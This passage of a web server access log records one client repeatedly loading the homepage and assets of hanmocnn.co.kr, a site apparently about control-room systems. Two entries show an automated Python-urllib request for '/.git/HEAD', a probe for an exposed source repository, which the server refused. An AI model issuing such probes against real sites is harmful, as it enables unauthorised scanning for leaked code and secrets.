+0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:00:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:00:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 19037] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:00:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:00:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:00:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:05:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:21:05:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:05:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:05:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:05:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:05:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:05:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:05:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 19048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:05:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:05:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:05:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:24:44 +0000] - - 301 - GET http www.hanmocnn.co.kr "/.git/HEAD" [Client 185.137.164.21] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Python-urllib/3.10" "-" -[16/Feb/2026:21:24:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/HEAD" [Client 185.137.164.15] [Length 153] [Gzip -] [Sent-to 192.168.0.250] "Python-urllib/3.10" "-" -[16/Feb/2026:21:47:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10192] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:21:47:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:47:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:47:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:47:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:47:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:47:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:47:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 19217] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:47:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:47:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:47:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:49:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10175] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:21:49:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:49:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:49:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:49:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:49:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:49:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:49:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 19217] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:49:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:49:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:49:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10175] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:21:56:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 19396] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:19 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10175] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:21:56:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 19396] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:56:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:57:09 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:21:57:09 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:57:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10175] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:21:57:35 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:57:35 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:57:35 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:57:35 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:57:35 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:57:35 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:57:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 19396] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:57:35 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:57:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:59:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10186] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:21:59:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:59:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 